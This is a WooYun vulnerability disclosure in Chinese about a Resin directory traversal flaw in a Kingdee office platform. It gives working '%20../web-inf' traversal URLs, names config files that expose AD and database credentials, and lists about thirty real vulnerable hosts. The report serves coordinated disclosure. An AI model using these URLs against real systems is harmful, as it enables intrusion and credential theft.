当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126353

漏洞标题:Resin漏洞利用案例之目录遍历/以金蝶某系统为例

相关厂商:金蝶

漏洞作者: Wulala

提交时间:2015-07-13 09:57

修复时间:2015-10-12 11:04

公开时间:2015-10-12 11:04

漏洞类型:默认配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向第三方安全合作伙伴开放
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

Wooyun上关于Resin的相关漏洞相对较少,而且很多漏洞的准确性有待商榷(比如关于Resin的viewfile漏洞). 最近接触到Resin的漏洞,准备写一篇drop总结一下Resin的漏洞,所以需要收集一些案例, 下面是以金蝶某系统为例进行说明.

详细说明:

首先,得先说明一下本次需要利用的漏洞
Caucho Resin多个远程信息泄露漏洞(建议先阅读下面三个漏洞)
https://www.rapid7.com/resources/advisories/R7-0028.jsp
https://www.rapid7.com/resources/advisories/R7-0029.jsp
https://www.rapid7.com/resources/advisories/R7-0030.jsp
漏洞描述
Resin for Windows实现上存在多个漏洞,远程攻击者可能利用此漏洞非授权获取敏感信息。
Resin没有正确过滤通过URL传送的输入,允许远程攻击者通过在URL中提供有任意扩展名的DOS设备文件名从系统上的任意COM或LPT设备读取连续的数据流、通过目录遍历攻击泄露Web应用的WEB-INF目录中的文件内容,或通过包含有特殊字符的URL泄露到Caucho Resin服务器的完整系统路径。
测试代码:
http://www.example.com:8080/[path]/[device].[extension]
http://www.example.com:8080/%20../web-inf
http://www.example.com:8080/%20
http://www.example.com:8080/[path]/%20.xtp
漏洞危害:
通过此漏洞可以读取到串口设备的信息以及网站任意目录的文件遍历,我们这里之对Web相关的进行测试.
测试系统:
http://60.194.110.187/kingdee/login/loginpage.jsp

通过上面的漏洞,我们构造后的URL:
http://60.194.110.187/kingdee/%20../web-inf/

2015-07-12--001.png


当然我们可以遍历Web目录下任何目录内容,通过信息挖掘知道Web目录下存在editor目录

2015-07-12--002.png


总结:
此漏洞利用条件:
受影响系统:
Caucho Technology Resin v3.1.0 for Windows
Caucho Technology Resin v3.0.21 for Windows
Caucho Technology Resin v3.0.20 for Windows
Caucho Technology Resin v3.0.19 for Windows
Caucho Technology Resin v3.0.18 for Windows
Caucho Technology Resin v3.0.17 for Windows
Caucho Technology Resin Professional v3.1.0 for Window
注意:Windows平台的Resin受此漏洞影响
/*************************** 以上就是关于Resin漏洞的说明 *******************/
下面说明金蝶协同办公平台,金蝶基于Resin的协同办公平台引用了存在此组件因此导致目录遍历。 金蝶基于安全考虑,将很多配置文件和代码存放在web-inf目录,冤大头。
目前泄露的配置有:
/web-inf/classes/ad_config.conf AD域服务器账号和密码(当然是配置的情况下)

2015-07-12--003.png


/web-inf/classes/ctop.conf ctop数据库账号和密码

2015-07-12--004.png


/web-inf/classes/sms_config.conf 短信网关
我发现Web根目录还有存在两个目录 /editor & /disk

2015-07-12--005.png

(FCKEditor)

2015-07-12--006.png

(各种未授权访问&用户信息泄露)
最可笑的是,这里不用利用Resin的漏洞可以目录遍历
http://60.194.110.187/kingdee/editor/
http://60.194.110.187/kingdee/disk/

2015-07-11--009.png


就用你做这个案例了

漏洞证明:

为了证明这个漏洞的通用性,当然需要证明一下通用。
用Zoomeye和FoFa大约统计了一下,处于互联网的此系统大约有上百个,下面简单罗列一下
http://60.194.110.187/kingdee/%20../web-inf/
http://61.190.20.51/kingdee/%20../web-inf/
http://60.220.220.162:8080/ctop/%20../web-inf/
http://61.146.237.104:8080/kingdee/%20.../web-inf/
http://122.139.60.103:800/kingdee/%20../web-inf/
http://bluesun.com.cn:8080/%20../web-inf/
http://oa.cimri.cc:8090/kingdee/%20../web-inf/
http://oa.guanhao.com:8080/kingdee/%20../web-inf/
http://222.179.238.182:8082/kingdee/%20../web-inf/
http://58.22.49.189:8080/kingdee/%20../web-inf/
http://223.95.183.6:8080/kingdee/%20../web-inf/
http://222.168.29.170:81/kingdee/%20../web-inf/
http://222.134.77.23:8080/kingdee/%20../web-inf/
http://222.133.44.10:8080/kingdee/%20../web-inf/
http://222.72.132.71:8080/ctop/%20../web-inf/
http://222.72.133.79/ctop/%20../web-inf/
http://221.226.149.17:8080/kingdee/%20../web-inf/
http://221.214.220.19:8080/ctop/%20../web-inf/
http://221.4.245.218:8080/kingdee/%20../web-inf/
http://220.248.45.50:8080/ctop/%20../web-inf/
http://220.179.119.210:8080/ctop/%20../web-inf/
220.180.150.241:8080/ctop/login/%20../web-inf/
http://220.180.150.241:8080/ctop/%20../web-inf/
220.189.244.202:8080/kingdee/%20../web-inf/
http://220.189.244.202:8080/kingdee/%20../web-inf/
220.178.198.101/ctop/%20../web-inf/
http://220.178.198.101/ctop/%20../web-inf/
219.159.83.81:8080/ctop/%20../web-inf/
http://219.159.83.81:8080/ctop/%20../web-inf/

修复方案:

1. 升级Resin 3.1.1以上
2. 对/editor/ 和 /disk 访问限制

版权声明:转载请注明来源 Wulala@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-14 11:02

厂商回复:

谢谢对金蝶的关注,深入研究金蝶系统发现安全漏洞。我们已通知相关部门修复。

最新状态:

暂无